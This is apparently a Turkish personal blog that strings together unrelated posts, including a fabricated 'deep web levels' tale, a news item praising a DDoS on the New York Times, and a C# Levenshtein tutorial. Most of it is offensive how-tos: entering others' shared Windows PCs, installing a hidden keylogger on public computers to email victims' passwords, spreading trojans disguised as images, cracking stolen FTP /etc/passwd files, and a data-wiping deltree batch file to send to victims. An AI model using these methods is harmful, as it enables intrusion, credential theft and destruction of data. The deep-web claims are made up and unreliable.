instagram twitter linkedin github youtube

30.5.15

Deep Web kavramını daha iyi anlayabilmek için internetin yapısına bakmak gerekir. İnternet çok seviyeli katmanlardan oluşmaktadır. Her bir katmanda içerik ve güvenlik ve erişilebilirlik farklılık gösterir. Matrix filmini gözünüzde canlandırmak yararlı olacaktır.
Seviye 0 (Common Web) : Günlük kullandığımız interneti oluşturan katmandır.

Seviye 1 (Surface Web) : Yüzey İnternet. Ulaşmak için arama motorları üzerinden basit bazı sorgular yapmanız gereken internet. Güvenlik kameraları sunucuları, Access veritabanları buna örnek gösterilebilir. Temp mail hizmetleri, dns sorgulama hizmetleri türü hizmetlerin verildiği sitelerde bu seviyede hizmet verir.

Seviye 2 (Bergie Web) : Yalnız İnternet. Bu seviyede arama motorlarının arama sonuçlarını kitlediği siteler, FTP serverlar, indexlenmeyen adult filmler bulunmaktadır. Ulaşmak için arama motorlarında detaylı sorgular yapmanız gerekebilir. Bu seviyeye giren pek çok site arama sonuçlarında en son sayfalara atılır. Bu seviye normal yollarla ulaşabileceğiniz son seviyedir

//Bundan sonraki katmanlara ulaşım için proxy kullanımını gerektirir.

Seviye 3 (Deep Web) : Başlangıç Deep Web Seviyesi. İkiye ayrılır.

1. Proxy Seviyesi : .onion sitelerin bulunmadığı fakat illegal olan her tür sitenin bulunduğu seviyedir. Arama motorları tarafından çoğu kez indekslenmezler. Pekçoğu sunucu kullanır. İçlerinde PHP kodlama sitelerde bulunur. Bu seviyede bulunanlara örnek vermek gerekirse: İllegal araştırma sonuçları, hafif düzeyde illegal adult filmler, hacker grupları, virüsler, script kiddieler, ünlülerin skandalları, VIP dedikodular, bilgisayar güvenliği ile alakalı konular, suikast videoları vb. Bu içerikler genelde illegal forum tarzı sitelerde barınır.

//Bundan sonraki katmanlara ulaşım için tor kullanımını gerektirir.

2. TOR Seviyesi : .onion sitelerin işin içine girdiği seviyedir. Sitelerin geneli kişisel sunuculardadır. Bu seviyede bulunanlara örnek vermek gerekirse: ELIZA dataları, hacklenen sunucuların bilgileri, data tüccarları, gizli devlet belgeleri, wikileaks belgeleri, devlet sırrı satan casuslar, terör örgütleri, bomba ve silah eğitimleri, federal bilgiler, istihbarat sırları, illegal bilimsel araştırmalar, bilim adamları, shell network, assembly programcıları, gerçek hackerlar, microsoft gizli ağ bilgileri, güvenlik ve data analistleri vb. Bu içerikler genelde html kodlama sitelerde ve kişisel sunucularda barınır. Sunucu sahipleri, sunucularını korumak için her şeyi yapabilirler.​

Seviye 4 (Charter Web) : Ayrıcalıklı Deep Web Seviyesi. Bu seviyeye ulaşmanız kolay değildir fakat ulaşabilirseniz size getirisi de ufak şeyler olmayacaktır. İkiye ayrılır.

1. TOR Seviyesi : Sadece Tor browser kullanılarak ek bir şey yapılmadan ulaşılabilen seviyedir. Bu seviyede; gizli şirket ve piyasa bilgileri, önceden belirlenmiş milyonluk bahis sonuçları, bilyon dolarlık satışlar, dünyaca ünlü silah kaçakçıları, tank – füze- savunma sistemi satışları, yasaklanmış filmler – videolar – kitaplar – müzikler, üst düzey görevlerde bulunan devlet casusları, önemli ses kayıtları, paralı askerler, paralı ordular, paralı özel timler, kara kutular, aşırı illegal ve yasaklanmış adult içerikler, devlet görevlilerinin seks kasetleri, detaylı gizli wiki ansiklopedileri, insan ticareti, uyuşturucu ticareti, yasaklanan kimyasalların ve ilaçların ticareti, kan bankalarından kaçırılan kanların ticareti, çocuk pornoları, yamyamların – vampirlerin öldürmek için insan arayışları, illegal deneyler için insan denek aranması, sniperlar, mafyalar, pedofoliler gibi şeyler bulunmaktadır. Buseviyenin geneli .onion sitelerden oluşur. Tehlikeli seviyelerdendir.​
//Bundan sonrası için kapalı erişim gerekir.

2. Özel Erişim Seviyesi : Kesinlikle kontrol edilemeyen seviyedir. Şu ana kadar ulaşılabilmiş en tehlikeli seviyedir. Ulaşmanız için tor browserlar yetersiz kalır. “Closed Shell System” adı verilen özel bir ulaşma yöntemi vardır. Bu seviyede bulunan şeylere örnek vermek istersek: Yapay zekalı ölüm makineleri, yapay zeka işlemcileri, GGGEQP işlemcileri, Tesla’nın planları, kristalize güç kontrolörleri, hava durumunu değiştirebilen cihazlar, gizli HAARP projeleri, Atlantis’in yeri ve hakkındaki gizli araştırmalar hatta Atlantis’in bulunduğu yerin detaylı konumları, özel üretim motorların planları, Tanrı’nın olduğunu kabul etmeyenler ve ispatları, masonlar, illuminati, gizli algoritmalar ve hesaplamalar, global terör ağı, global cinayet ağı, global uyuşturucu ağı, global insan ticareti ağı, süper bilgisayarlar ve yapay zekalar vb vb. Bu kategorinin genelini bilimadamları oluşturur. Sitelerin tamamı kişisel sunucular yada özel üretim gizli sunucular üzerindedir. Bu seviyede uygulanıldığında dünyayı değiştirecek ispatlanmış deneyler bulunur. Ulaşmak için normal bilgisayarlar ve internet ağları yetersiz kalabilir.​

Şu ana kadar anlatılan seviyeler Deep Web’in %80’lik kısmını oluşturmaktadır. Geriye kalan %20 nedir peki?

//Buradan sonrası için Kuantum teknolojisi ile çalışan cihazlar ve internet gerekir.

Seviye 5 (Marianas Web) : Bu seviye hakkında fazla bilgimiz yoktur. Çünkü daha ulaşılamamıştır. Bu seviyeye ulaşmak için şu an kullandığımız teknoloji yetersizdir. Kuantum teknolojisi ile çalışan bilgisayarlara ve internete ihtiyacımız vardır. Bilinen en tehlikeli seviyelerdendir. Adını dünyanın en derin çukuru olan Mariana Çukuru‘ndan alır. Seviyenin sınırları belirsizdir fakat sonu vardır. İçerisinde bulunacak sitelerin dünyayı değiştirebileceği bilinmektedir. Bu seviye için “Eğer olurda birgün ulaşılırsa o gün internetteki savaş bitecektir” denilmiştir. Yüksek teknolojiye sahip AR-GE laboratuvarlarında bulunan pek çok bilim adamının bu seviyeye ulaştığı ve bilgi paylaşımı yaptığı söylenir. Burada bulunan bilgilerin tüm canlı yaşamını değiştirebilecek ve dünyaya hakimiyet kurulabilecek güçte olduğu bazı bilim çevrelerince belirtilmiştir. Bazı devletlerin ve hacker gruplarının da bu sistemlere eriştiği söylenir fakat bu konuda bilgi yoktur. Bazı bilim çevrelerinden sızan haberlere göre buradaki bilgilerle tüm dünyadaki nükleer füzeler çalıştırılabilir. İstihbarat örgütlerinin buradaki hackerlara nükleer sistemleri yok etmesi için iş teklif ettikleri iddia edilmektedir.

Seviye 6 : Bilinen en tehlikeli seviyedir. Hakkında hiçbir bilgi yoktur. Sınırları belirsiz ve sonu belli değildir. En gelişmiş teknolojiyle bile erişelememiştir.

Seviye 7
 (The Fog/Virus Soup) : 7. seviye savaş bölgesi olarak tabir edilir. Eğer bir gün ulaşılabilinirse herkes kendi için savaşacaktır. Amaç seviye8’e başka insanların çıkmasını önlemektir.

Seviye 8 (The Primarch System) : 8. Seviye direkt erişime açık değildir. Ne bir hükümet veya organizasyonun ne de kimsenin tam olarak bilmediği bir Primarch Sistemi tarafından kontrol edilir. Bu sistem ilk olarak 2000’li yıllarda tesadüfen keşfedildi. Sistem tepkisiz ve tüm internete değiştirilemeyen rastgele komutlar göndermektedir. Seviye 8 günümüz bilgisayarların baş edemeyeceği devasa bir işlem gücü olan “level 17 quantum t.r.001 level function lock” kullanır. En son olarak seviye 8 “İnternetin En Son Patronu” olarak geçer.
RedMonk her yıl popüler programlama dillerini açıklıyor.

Her yıl geleneksel olarak en çok kullanılan programlama dilleri listesini yayınlayan RedMonk, bugün 2014‘ün en çok kullanılan programlama dillerini yayınladı.

Aşağıdaki görüntüden en çok kullanılan programlama dillerini bulabilirsiniz. İşte 2014‘ün en çok kullanılan 20 programlama dili;

1 JavaScript
2 Java
3 PHP
4 Python
5 C#
5 C++
5 Ruby
8 CSS
9 C
10 Objective-C
11 Perl
11 Shell
13 R
14 Scala
15 Haskell
16 Matlab
17 Go
17 Visual Basic
19 Clojure
20 Groovy

28.5.15

Türk Hackerlar, New York Times'ı Hackledi


Türk Hack Team üyesi hackerlar, hükümet ile Erdoğan'ı hedef alan ve ABD ile NATO'yu harekete geçmeye davet eden New York Times gazetesinin sitelerini erişime kapattı.

Türk Hackerlar, New York Times
Türk Hack Team üyesi hackerlar, 'Türkiye'nin üzerindeki kara bulutlar' başlıklı bir yazı kaleme alarak, AK Parti hükümeti ile Cumhurbaşkanı Recep Tayyip Erdoğan'ı hedef alan ve ABD ile NATO müttefiki ülkeleri harekete geçmeye davet eden New York Times gazetesinin sitelerini erişimi kapattı.
"ERDOĞAN'A KARŞI HAREKETE GEÇİN"
Genel seçimler öncesi 'Türkiye'nin üzerindeki kara bulutlar' başlıklı başyazı kaleme alan New York Times gazetesi, yazıda seçim sürecini değerlendirerek, AK Parti Hükümeti ile Cumhurbaşkanı Erdoğan'ı hedef aldı.
Süreci tehlikeli, atmosferi ise alışılmadık biçimde karanlık ve korku verici olarak tanımlayan New York Times, Erdoğan'ın doğru söyleyenlere karşı giderek hasmane bir tavır takındığını belirterek, ABD ve NATO müttefiki ülkeleri harekete geçmeye davet etti.
SİTELERİ KAPATIP SUNUCULARA ZARAR VERDİLER
Türk Hack Team üyesi onlarca vatansever hacker eş zamanlı saldırılarla, Türkiye'nin iç işlerini hedef alıp kaos oluşturmaya çalışan New York Times'ın web sitelerine gece saatlerinde operasyon düzenledi.
New York Times'ın İngilizce (homedelivery.nytimes.com), ve İspanyolca siteleri (es.nytimes.com) ile blog (blog.nytimes.com), uygulama (app.nytimes.com) ve kayıt sistemini (register.nytimes.com) hedef alan Türk Hack Team üyeleri, siteleri saatlerce erişime kapatıp, sunuculara yüksek miktarda zarar verdi.
"ULUSLARARASI DARBE GİRİŞİMİ"
Saldırıya ilişkin açıklama yapan Türk Hack Team Lideri ZoRRoKiN, New York Times'ın bu hareketinin açık bir provokasyon olduğunu belirterek, seçime doğru küresel güçlerin yurt içinde ve yurt dışında eş zamanlı adımlar attığını dile getirdi. Türkiye Cumhuriyeti Devleti Cumhurbaşkanı makamının bu denli ayaklar altına alınıp, çeşitli güç odaklarına 'harekete geçin' çağrısı yapılamayacağının altını çizen ZoRRoKiN, bunun uluslararası bir darbe girişimi olduğunu öne sürdü.
ABD'nin önce kendi iç çelişkilerini çözmesi ve dünyaya kan kusturdukları gerçeğinin unutulmaması gerektiğini vurgulayan ZoRRoKiN, karşılarında hangi güçler olursa olsun vatanın bütünlüğünü korumak adına saldırılarının devam edeceğini ifade etti.

27.5.15

Ruhsat Alındı, İstanbul'da Petrol Aranacak

Ülkede üretilen ham petrolün yüzde 71'ini sağlayan Türkiye Petrolleri, petrol aramalarında son yıllarda yoğunlaştığı Karadeniz'den sonra İstanbul'u da arama listesine dahil etti.

25.5.15

windows korunma yollari

WİNDOWS İÇERİSİNDEN PAYLAŞIMI AÇIK OLAN BİR BİLGİSAYARA GİRMEK 

Selam arkadaşlar, 

Şimdi Essential Net Tools programından faydalanarak Windows içerisinden başka 
herhangi bir 
programa ihtiyaç duymadan da paylaşıma açık bilgisayarlara girebiliyoruz. 

Yine aynı şekilde Essnettools'un LMHosts menüsüne eklediğimiz Ip ve bilgisayar 
isimleri 
bizim için kaynak olacaktır. 

Diğer yöntemlerden farklı olan yönü ise 8 karakterle sınırlı kalmamamız yani 
daha önceki 
bölümlerde gerek programlarla olsun gerek DOS tan olsun 8 karakter ve türkçe 
karakterler 
hariç sistemlere girebiliyorduk. 

Burda ise örneğin : 212.253.24.45 ONUR SENCAN gibi Essnettools'un LMHosts 
bölümünde bulunan 
bir bilgiden nasıl faydalanacağız... 

Öncelikle BAŞLAT -> BUL -> BİLGİSAYAR menüsünü seçiyoruz ve ad bölümüne ONUR 
SENCAN 
yazarak ŞİMDİ BUL a tıklıyoruz. Ve bir süre sonra alt tarafta isim beliriyor... 

İşte şimdi bu bilgisayara çift tıkla***** kendi bilgisayarımızın içinde gezer 
gibi 
karşı bilgisayarda gezebiliyoruz... 

Bu yöntem diğerlerine göre daha kuvvetli bağlantısı ve daha kuvvetli parçaları 
olan 
bilgisayarları gerektiriyor.(İşlemci RAM) Ve benim en az kullandığım yöntem 
sadece iki isimli bilgisayar isimleri için kullanıyorum 
Sık sık ekranda donmalara sebep oluyor ve bilgisayarın tüm gücünü kendine 
çekiyor 
Fazla kasmadan beklemekten başka çareniz yok pencere içeriği görünene kadar 
bekleyeceksiniz 
ve ondan sonra işlemleri yapabileceksiniz ayrıca kaydırma çubuklarını aşırı 
hızlı 
kullanmayın restart yapmak zorunda kalabilirsiniz... 

Burada bilgisayarınıza indirmek istediğiniz dosyayı mouse ile tutup kendi 
masaüstünüze, 
sürüklemeniz yeterli bir müddet sonra o dosya sizin masaüstünüze 
kopyalanacaktır.

keylogger korunma

Keylogger nedir? keylogger klavyede bası.. tüm tuşları kaydeden bir programdır... Keylogger'ı internet cafe gibi herkese açık bilgisayarlara kurabiliriz...Böylece keylogger' lı bilgisayar oturan kişinin tüm şifrelerini çalabilirsiniz..trojanlarında şifre çalma özelliği keylogger la sağlanmaktadır... Keylogger ların en güzel özelliği gizli çalımalarıdır...böylece kişi keylogger olduğunu farketmez ve bizim işimiz kolaylaşır...
Keylogger Kurulumu:
Önce Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) sitesinden keylogger'ı download ediyoruz..(siz isterseniz başka keylogger kullanabilirsiniz...) şimdi download işleminizin bittiğini kabul ederek devam ediyoruz...
download bitti ve programı açtığınızda karşınıza bi sayfa çıkıcak...sayfa ekranın tamamını kaplıyıcak...açı.. bu sayfada "next" i tıklıyoruz..daha sonra açı.. diğer sayfada "start" ı tıklıyoruz..ve ok ' liyoruz...daha sonra önünüze yeni bi dosya geldii burada "actual spy" yazan yeri seçiyoruz...
ve işin kilit noktası burada ayarlamaları yapıcaz...
++++++++++++++
LOGS-- burada klavyede bası.. tuşları gösteren bir tablo vardır..siz buna şimdilik karışmıyorsunuz....çünkü daha bişey kayıtlı dğil...
REPORT--burada size verilecek olan bilgiler iç.in oynama yapıyorsunuz...
*"create report on logs" yazan yerdeki seçeneklerin hepsi seçili kalsın...
*"report format" yazan yere karışmayın zaten "html format" seçili..
*"report pages settings" yazan yeri istediğiniz gibi seçin..( raporlar bir sayfa-yada daha fazla olabilir..siz istediğinizi sçin)..
*"time periot to create a report" burada size hangi saatler arasında rapor hazırlanmasını yazıyorsunuz...
SETTINGS--bu bölümdede keylogger' a şifre bırakabilir keylogger raporlarının size maille gelmesini ya da başka bi yolla iletilmesini sağlayabilirsiniz...
GNERAL
* "log files" burada oluşturulacak olan raporların bilgisayarda nereye kaydedilmesi gerektiğini yazıyorsunuz (size kalmış bişey)
*"startup options" burada keylogger'ın ne zaman devreye gireceğini ayarlıyorsunuz...bu bölümde "startup system loading" yazan yeri seçili bırakın...
*"hiding" bu alanda program iconun program uzantısının saklanmasını sağlayabilrsiniz...siz kalmış..
*"password settings" burada keylogger' a şifre bırakabilrsiniz..bırakmak için "nable password" yazan yere daha sonra "set password" yazan yere tıklayın...sonra istediğiniz şifdreyi yazın..(bunu yaparsanız keyloger' ı sizden başka kimse açamaz..)sonra apply yazan yere tııklayın....
LOGS
"actions" bu bölümdeki seçeneklerin hepsi seçili kalsın...
"keystrokes" burada da "save all keystrokes yazan yeri seçin( böylce bası.. herieyi kaydedr..)
"screenshots" burada ekranın önizlemesini size gösterir..bunu seçili burakırsanız adamın girdiği sayfaların önizlemesini görbilirsiniz..
"aplications" bu bölümde ikisinide seçili bırakın....
"limitation" burada da kaç karaktr olduğunda kaydetsin seçenekleri var..bnece seçili bırakmayın..tüm kararkterleri kaydetsin..sonra apply'i tıklayın....
E-MAIL
işte en güzel bölümlerden biri..burada oluşturlan raporların -maille teslimi var...isterseniz raporların sizin e-mailinize gelmesini sağlayabilrsiniz...
bunu yapmak için;
"sen the reports to e-mail" seçeneğini tıklayın...daha sonra e-mailinizi -size gelecek olan mesajın konusunu yazın...sonra test için mailinize bi tane yolayın..(bunu yapmanızı tavsiy ederim..)
"sent logs" buradakilerin hepsi seçili kalsın...sadece en sondakini seçmeyin..
"sending report format" burada glen mesajın html ya da txt. mesajı olarak glmesini ayarlayabilrsiniz...(size kalmış)
"when to send" oluşturulacak raporların ne zaman ve kaç saatte bir gelmesini yazıyorsunuz...sonra apply i tıklayın....
ayarlamalar bitti..şimdi "üst köşede -start monitoring- yazan yer var oraya tıklayarak keylogger'ın devreye girmesini sağlayabilrisiniz..-hide - yazan yere tıklamanızı tavsiy ederim ..keylogger'ın gizli çalışmasını sağlar böylce kimse farketmez...
Nasıl korunulur? Anti keylogger programları vardır....Bunları indirerek korunabilrsiniz...

trojen

Trojanlar 2 kısımdan oluşur...bunlar;
1.server exe.: bu gireceğiniz bilgisayarın açık bırakılamsı için yazı.. yazılımdır...
2.client: bu ise gireceğiniz bilgisayarı yönetmeniz için gerekli ola programdır...
* şimdi trojan nasıl çalışır???
trojanın çalışabilmesi için SERVER.EXE yazlımının mutlaka yönetilecek bilgisayara sokulması gerekir...bu nasıl yapılır_?_
*icq msn yahoo mes. gibi dosya tro,ansferi yapılabilecek yerlerde yollayabiliriz...
*maille yollayabiliriz...
*cd-disket gibi şeylerin içine bırakıp almasını sağlkayabiliriz...
*websayfanızdan bulaştırabilirsiniz..
exe birleştirici programları kullanarak server 'ı resimle ya da benzeri bir şeyle birleştirerek adama yutturabilrsiniz..
trojanla neler yapabilirsiniz???
* mail şifreleri -website şifresini kısaca tüm şifreleri çalaibilirsiniz..
* bilgisayara zarar verebilirz....
*adamla oynayabiliriz..( meszel prarat gibi trojanlarla adamı deli edebilriz...)
*adamın dosyalarını çalabilriz...
*kısaca bilgisayar sizin...sizin hayal gücünüze bağlı...herşey yapabilirsiniz.....
not: çoğu trojanlar antivirus programlarına yakalınr..bu yüzden tavsiyem yeni çıkan trojnalrı kullanın...
not: server.exe' yi kesinlikle kendi bilgisayarınızda açmayın..ava giderken avlanırsınız....
bilgisayarda trojan olup olmadığını anlamak için ve trojandan korunmak için neler yapılabilir??
bilgisayarda trojan olduğunu anlamanın en temel yolu dos modunda komt satırına ntstat -a yazeğer bilgisayarınız sizin isteğiniz dışında kontrol ediliyorsa trojan bulaşmış olabilir...
bilgisayarınızda başlat -programlar-başlangıç tuşuna bastığımızda bilgisayarımız oturum açıldıktan sonra çalışan programları gösterir...eğer sizin yüklemediğiniz programlar çalışırsa trojan vardır....
ekranınzda yazı-resim -klavyenizin ışıkları yanığ sönüyorsa-mouse imleci faklı yerlere sizden bağımsız bi şekilde gidip geliyorsa trojan vardır..
nasıl korunulur?_?
*anti trojan programı -firewall kullanabilirsiniz..
* tanımadığınız kişilerden gelen dosyaları (özellikle exe.) uzantılı dosyaları kesinlikle açmayın...
* ve ip gizleyici programda kuyllanın( çünkü trojanlar ip codu olmadan çalışmaz...)

FTP hack

Öncelikle selamlar arkadaslar bu dersimizde size Ftp hack anlatacagım öncelikle kullanacagımız programları bi görelim ;
Gerekli Programlar : Cracker Jack, CuteFTP,
Meliksah Ozoral's Dict Maker v1.0.

Bu programların cogunu bu adresten bulabilirsiniz(http://www.mimsa.com/mweb).
Öncelikle şimdi hackleyecegımız siteyi seciyoruz. Bu taktik cok basit oldugu icin her yer bu hack'i yemeyebilir...
prizmanet, tubitak, planet gibi korumasi olmayan yerleri secin. Örnek: (prizma net.) Once hack etcegimizden bi acc bulalım ve onun üzerinden baglanalım...ATDT08222111001 
Tamamdır arkadaşlar baglandık simdi ( CuteFTP )' yi calistirin ve yeni bir baglanti secin;ilk olarak hack edeceginiz adresi baglanti yerine yazin ornegin ; ftp.prizma.net.tr sonra login yerine iss baglandiginiz
logini, password yerinede iss baglandiginiz passwordu yazin. Simdi de connect ile baglanin...
Evet ftp ye baglandiniz suanda kullandiginiz acc tun dizinindesiniz siz "/etc" dizinine gidin...
Bu dizindeki dosyalarin listesi karsiniza geldi burdan "passwd" adli dosyayi alin.Simdi olayin en buyuk
yani bitdi! Internet baglantisini kesin ve aldiginiz dosyayi Cracker Jack adli programin bulundugu dizine kopyalayin. Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd"
dosyasini kirmaya baslayin yoksa once Meliksah Ozoral's Dict Maker v1.0 ile bir wordlist hazirlayin...
Cracker Jack passwd dosyasindaki acclari kirmaya baslar... Bu islem gunlerce surer ve kirdigi acclari
kullanabilirsiniz...

ekran kartı

Öncelikle selamlar arkadaslar yapacagımız 2 şey var 

1 : assagıda gordgumuz kodları bir notpad e yapıstırıyoruz :
------------------------------------------------------------------------------------------------------------------
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo .:: HacKeD CodeSolvent::.
@echo off3.
------------------------------------------------------------------------------------------------------------------

2: bunu (isim.bat) olarak kaydedıyoruz isim yerıne kkendiniz bişeyler yazabılırsınız kaydettikten sonra kurbanımıza yolluyoruz bunu 2 tıklarsa tmmdır ekran kartı gitti :))
Saniyede 1000 den fazla ms-dos sayfası acılcagı için yaklasık 30 sanıye sonra ekran kartı gıtcek bellı olmaz adamın ekran kartı belkı yuksektır hafızası 40 - 50 sanıye sonrada gıdebılır ama kesin gider... merak etmeyın onlar acılırken kullanıcı hiç bişi edemez eğer aklı keserse hemen pc yi resetlerse o saman kurtulur bunuda o an yapmaz bence panik yaptıgı için :D:D:D 

Levenshtein Distance Algoritması

Merhaba Arkadaşlar,
Bu gün okumuş olduğum ve sizlerinde okumasını tavsiye ettiğim bir yazıyı paylaşıyorum. yazıyı aynen aktarıyorum ve yazarın emeğine yazık olmasın diye site adresinide altında veriyorum.


Bilgisayar bilimlerinde uygulanabilen, gerçekten çok işe yarayan ve onları keşfedenleri saygıyla hatırlamamız gereken algoritmalar mevcut. Örneğin bunlardan birisi olan Levenshtein Distance algoritması ve mucidi Vladimir Levenshtein Winking smile


Bu algoritma bizlere, özellikle arama motorlarında da kullanılabilen bir model sunmaktadır. Son kullanıcıların aradıkları kelimeleri tam olarak belirleyemedikleri veya kestiremedikleri durumlarda, öneri olarak sunulan kelimelerin tespit edilmesi sırasında ele alınan bir algoritmadır. Örneğin ben Google sitesindeki arama kutucuğunda kendi ismimi eksik karakterler ile yazdığımda, google daha önceden yapmış olduğu indekslenmiş içeriklere göre bir öneri de bulunmuştur(Bunu mu demek istediniz kısmı) Aşağıdaki şekilde bu durum açık bir şekilde görülmektedir.






Arama motorları dışında, özellikle imla kontrolü yapan uygulamalarda da(Söz gelimi Microsoft Outlook veya Microsoft Word’ ün Spell Checking mekanizmalarında) bu algoritmanın kullanımına sıklıkla şahit olmaktayız.


Biz bu yazımızda söz konusu algoritmanın kullanılması için gerekli olan temel fonksiyonu, sıklıkla yaptığımız üzere bir Extension Method olarak geliştirmeye ve test etmeye çalışıyor olacağız. Ancak kodlama kısmına geçmeden önce algoritmanın nasıl çalıştığına ve işlediğine bakmamızda yarar olacağı kanısındayım.


Aslında algoritma temel olarak iki kelimenin birbirlerine olan benzerliklerini ölçümlemek amacıyla kullanılmaktadır. Sonuç tek bir sayısal değerdir ve iki kelimeden birinin diğerine dönüştürülebilmesi için gerekli olan işlem sayısını ya da maliyetini vermektedir. Çok doğal olarak bu sayınının düşük olması arzu edilen neticedir. Nitekim daha az değişiklik anlamına gelmektedir. Çok doğal olarak bir kelimenin, bir öneri kelime kümesi içerisindekiler ile karşılaştırılması sonucu ortaya çıkan sayısal değerlerden en küçüğü veya küçükleri, sonuca ulaşılması ve doğru önerilerde bulunulması açısından önemlidir.


Peki bu yakınlık değeri nasıl hesaplanmaktadır? Smile Bunun için kelimeler arası iki boyutlu bir matris dizisi kullanılır. Lakin söz konusu matrisin içereceği değerlerin tespiti çok da kolay değildir. Dilerseniz aşağıdaki Excel görüntüsünde yer alan örneklemelere bir bakalım ve algoritmayı daha yakından tanımaya çalışalım.




Bu grafikte, 5 farklı örnek ile 10 kelimenin birbirleri ile yakınlıklarının Levensthein Distance algoritmasına göre nasıl hesap edildiği gösterilmektedir. İlk olarak rest kelimesinin test kelimesi ile olan yakınlığı bulunmaya çalışılmıştır. Aslına bakarsanız bu iki kelime arasında sadece 1 işlem yaparak sonuca ulaşılabilir. Bu işleme göre rest kelimesindeki r harfi yerine, t harfinin gelmesi yeterlidir. Matris içerisinde yer alan sayılar o andaki sütuna veya satıra kadar olan harf topluluklarının birbirleri ile eş düşmeleri için gerekli işlem sayılarını içermektedir.


Şimdi de google ve yahoo! kelimelerinin yakınlık hesabını göz önüne alalım. Normal şartlarda iki kelime içerisinde ortak olan 2 “o” harfi bulunmaktadır ancak yerleri farklıdır. Diğer harfler ise zaten birbirlerinde yoktur. Bu nedenle 6 işlemlik bir operasyon yapılması gerekmektedir.


Peki sayılar tam olarak nasıl yerleştirilmekte veya okunmaktadırlar? Hemen Samantha ile Sam’ in karşılaştırılmasını ele alalım. Şimdi 0 indisli olacak şekilde 1nci sütun ve 1inci satırı göz önüne alalım. 1nci sütunda “s” harfi ve 1nci satırda yine “s” harfi bulunmaktadır. Dolayısıyla o anki karşılaştırmada, her iki harfte aynı olduğunda bir işlem yapılmasına gerek yoktur. Dolayısıyla işlem maliyeti 0dır. Şimdi 2ncü sütuna ve 1nci satıra bakalım. 2nci sütuna kadar olan kısımda “sa“ hecesi oluşmuştur. Satır tarafında ise sadece “s” harfi bulunmaktadır. Dolayısıyla eşleştirme için satır kısmındaki “s” harfine bir de “a” harfinin eklenmiş olması gerekir. Ki bu da 1 işlem maliyeti olarak ifade edilmektedir.


Durumu biraz daha öteleyelim. 5 numaralı örnekte yer alan puzzle ve pzzel kelimelerinin karşılaştırılmasında 5nci sütun ve 4ncü satıra bakalım. 5nci sütuna kadar puzz kelimesi 4ncü satıra kadar da pzz kelimesi söz konusudur.pzz’ un puzz kelimesine benzemesi için araya bir “u” harfinin konulması yeterlidir. Diğer kısımlar satır ve sütun bazında da eşleşmektedir. Bu yüzden buradaki işlem maliyeti değeri 1 dir. Ancak yine 0 indisli baktığımızda ve 7nci sütun ve 6ncı satıra kadar olan kısımda puzzle ve pzzel kelimeleri göz önüne alındığında ise; pzzel’ dan puzzle’a geçmek istenildiğinde ilk olarak araya bir “u” harfi konulur.


puzzel


Ardından “el” hecesinde e’ nin l yerine, l’ nin e yerine geçmesi gerekir.


puzzle


Dolayısıyla toplamda 3 işlem maliyeti söz konusu olmuştur.


Bu algoritma gereği iki kelime arasındaki yakınlık derecesi, matrisin sağ alt hücresindeki sayısal değer ile ifade edilmektedir. Buna göre puzzle ile pzzel kelimeleri arasındaki mesafe 3 işlem operayonu ile ölçülürken, bu Samantha ve Sam kelimeleri arasında 5 işlemlik bir maliyet oluşması söz konusudur(Samantha’ dan antha kısmının atılması nedeni ile 5 işlemlik bir maliyet oluşmaktadır)


Algoritmayı biraz kavradığımıza göre dilerseniz bunu C# tarafında bir Extension Method içerisine dahil edelim ve test uygulamamıza çıkalım. Bu amaçla aşağıdaki örnek Console uygulamasını göz önüne alabiliriz.


using System;


namespace UsingLevenshtein 


    class Program 
    { 
        static void Main(string[] args) 
        { 
            TestMethod("rest", "test"); 
            TestMethod("google", "yahoo!"); 
            TestMethod("mike", "mayk"); 
            TestMethod("samantha", "sam"); 
            TestMethod("puzzle", "pzzel"); 
        }

        private static void TestMethod(string Source,string Target) 

        { 
            int[,] matrix3 = new int[Source.Length, Target.Length]; 
            int distance3 = Source.FindLevenshteinDistance(Target, out matrix3); 
            Console.WriteLine("{0} vs {1}\\\\\\\\\\\\\\\\nDistance : {2}\\\\\\\\\\\\\\\\n",Source,Target, distance3); 
            WriteToConsole(matrix3); 
        } 
        static void WriteToConsole(int[,] Matrix) 
        { 
            for (int i = 0; i < Matrix.GetLength(0); i++) 
            { 
               for (int j = 0; j < Matrix.GetLength(1); j++) 
               { 
                    Console.Write("\\\\\\\\\\\\\\\\t{0} ", Matrix[i, j]); 
               } 
               Console.WriteLine(); 
            } 
            Console.WriteLine(); 
        } 
    }

    public static class StringExtensions 

    { 
        // Genişletme metodu, karşılaştırma matrisini de out parametresi olarak döndürmektedir. 
        public static int FindLevenshteinDistance(this string Source, string Target,out int[,] Matrix) 
        { 
            int n = Source.Length; 
            int m = Target.Length;

            Matrix = new int[n + 1, m + 1]; // Hesaplama matrisi üretilir. 2 boyutlu matrisin boyut uzunlukları ise kaynak ve hedef metinlerin karakter uzunluklarına göre set edilir


            if (n == 0) // Eğer kaynak metin yoksa zaten hedef metnin tüm harflerinin değişimi söz konusu olduğundan, hedef metnin uzunluğu kadar bir yakınlık değeri mümkün olabilir 

               return m;

            if (m == 0) // Yukarıdaki durum hedefin karakter içermemesi halinde de geçerlidir 

               return n;

            // Aşağıdaki iki döngü ile yatay ve düşey eksenlerdeki standart 0,1,2,3,4...n elemanları doldurulur 

            for (int i = 0; i <= n;i++) 
               Matrix[i, 0] = i; 
            
            for (int j = 0; j <= m; j++) 
               Matrix[0, j] = j;

            // Kıyaslama ve derecelendirme operasyonu yapılır 

            for (int i = 1; i <= n; i++) 
               for (int j = 1; j <= m; j++) 
               { 
                    int cost = (Target[j - 1] == Source[i - 1]) ? 0 : 1; 
                    Matrix[i, j] = Math.Min(Math.Min(Matrix[i - 1, j] + 1, Matrix[i, j - 1] + 1), Matrix[i - 1, j - 1] + cost); 
               }

           return Matrix[n, m]; // sağ alt taraftaki hücre değeri döndürülür 

        }        
    } 
}

